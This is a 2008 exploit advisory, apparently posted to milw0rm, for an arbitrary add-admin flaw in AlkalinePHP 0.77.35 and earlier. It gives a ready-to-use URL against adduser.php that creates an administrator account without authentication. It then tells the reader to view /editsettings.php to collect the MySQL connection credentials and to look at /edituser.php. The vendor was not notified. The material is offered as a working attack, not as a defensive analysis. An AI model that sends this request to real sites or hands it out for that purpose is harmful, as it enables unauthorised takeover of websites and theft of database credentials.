--==+================================================================================+==-- --==+ AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin +==-- --==+================================================================================+==-- [*] Discovered By: t0pP8uZz [*] Discovered On: 17 MAY 2008 [*] Script Download: https://sourceforge.net/projects/alkalinephp/ [*] DORK: N/A [*] Vendor Has Not Been Notified! [*] DESCRIPTION: AlkalinePHP suffers from a insecure adminpage, since the page only handles requests the author probarly thought it was safe not to include admin checking, but when we view the source we can cleary see theres nothing to stop us making our own request. navigating to the below url (with domain replaced of course) will add a admin account. do not forget to replace "[user]" and "[pass]" with a actual "username" and "password". [*] Vulnerability: http://site.com/adduser.php?real_name=null&user_name=[user]&password=[pass]&level=10&email=null@null.com&website=null&misc=null [*] NOTE/TIP: after running the above url (with domain replaced of course) it may seem nothing has happend, but try loggin in after with the username and password you created. admin login is the normal user login. once your admin you can look here to view the mysql connection information "/editsettings.php" another intresting file to view is "/edituser.php" [*] GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! [-] peace, t0pP8uZz --==+================================================================================+==-- --==+ AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin +==-- --==+================================================================================+==-- # milw0rm.com [2008-05-18]